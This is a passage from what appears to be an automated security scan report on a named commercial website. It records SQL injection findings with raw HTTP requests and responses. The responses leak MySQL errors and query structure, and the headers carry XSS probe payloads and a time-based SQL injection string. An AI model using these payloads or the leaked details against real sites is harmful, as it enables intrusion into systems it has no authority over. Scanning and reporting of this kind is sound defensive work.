OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:22:40 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=3a3o48o6htpk167blpll3j2hp2; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/deco00/project_dynamic_page_updated.php was not found on this server.</p>

1.237. http://www.insideup.com/ppc/leadflow/dima00/leadflow/dima00/project.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/leadflow/dima00/project.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow'/dima00/leadflow/dima00/project.php?ca HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 07:01:15 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2182
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
group grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow'/dima00/leadflow/dima00/project.php?ca' OR prj.project_page_url = 'leadflow'/dima00/leadflow/dima00/project.php?ca/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?ca' OR prj.project_page_url = 'leadflow'/dima00/leadflow/dima00/project.php?ca/' at line 5

Request 2

GET /ppc/leadflow''/dima00/leadflow/dima00/project.php?ca HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 07:01:19 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 124
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow''/dima00/leadflow/dima00/project.php was not found on this server.</p>

1.238. http://www.insideup.com/ppc/leadflow/dima00/leadflow/dima00/project.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/leadflow/dima00/project.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00'/leadflow/dima00/project.php?ca HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 07:01:53 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2182
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
group grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/dima00'/leadflow/dima00/project.php?ca' OR prj.project_page_url = 'leadflow/dima00'/leadflow/dima00/project.php?ca/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?ca' OR prj.project_page_url = 'leadflow/dima00'/leadflow/dima00/project.php?ca/' at line 5

Request 2

GET /ppc/leadflow/dima00''/leadflow/dima00/project.php?ca HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 07:01:57 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 124
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00''/leadflow/dima00/project.php was not found on this server.</p>

1.239. http://www.insideup.com/ppc/leadflow/dima00/leadflow/dima00/project.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/leadflow/dima00/project.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/leadflow'/dima00/project.php?ca HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 07:02:45 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2182
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
group grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/dima00/leadflow'/dima00/project.php?ca' OR prj.project_page_url = 'leadflow/dima00/leadflow'/dima00/project.php?ca/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?ca' OR prj.project_page_url = 'leadflow/dima00/leadflow'/dima00/project.php?ca/' at line 5

Request 2

GET /ppc/leadflow/dima00/leadflow''/dima00/project.php?ca HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 07:02:49 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 124
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/leadflow''/dima00/project.php was not found on this server.</p>

1.240. http://www.insideup.com/ppc/leadflow/dima00/leadflow/dima00/project.php [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/leadflow/dima00/project.php

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/leadflow/dima00'/project.php?ca HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 07:03:20 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2182
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
group grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/dima00/leadflow/dima00'/project.php?ca' OR prj.project_page_url = 'leadflow/dima00/leadflow/dima00'/project.php?ca/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?ca' OR prj.project_page_url = 'leadflow/dima00/leadflow/dima00'/project.php?ca/' at line 5

Request 2

GET /ppc/leadflow/dima00/leadflow/dima00''/project.php?ca HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 07:03:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 124
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/leadflow/dima00''/project.php was not found on this server.</p>

1.241. http://www.insideup.com/ppc/leadflow/dima00/leadflow/dima00/project.php [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/leadflow/dima00/project.php

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/leadflow/dima00/project.php'?ca HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 07:04:05 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2182
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
group grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/dima00/leadflow/dima00/project.php'?ca' OR prj.project_page_url = 'leadflow/dima00/leadflow/dima00/project.php'?ca/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?ca' OR prj.project_page_url = 'leadflow/dima00/leadflow/dima00/project.php'?ca/' at line 5

Request 2

GET /ppc/leadflow/dima00/leadflow/dima00/project.php''?ca HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 07:04:06 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 124
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/leadflow/dima00/project.php'' was not found on this server.</p>

1.242. http://www.insideup.com/ppc/leadflow/dima00/leadflow/dima00/project.php [ca parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/leadflow/dima00/project.php

Issue detail

The ca parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ca parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/leadflow/dima00/project.php?ca' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:54:28 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2182
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
group grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/dima00/leadflow/dima00/project.php?ca'' OR prj.project_page_url = 'leadflow/dima00/leadflow/dima00/project.php?ca'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/dima00/leadflow/dima00/project.php?ca'/'
   union select prj.catId,prj.gr' at line 5

Request 2

GET /ppc/leadflow/dima00/leadflow/dima00/project.php?ca'' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
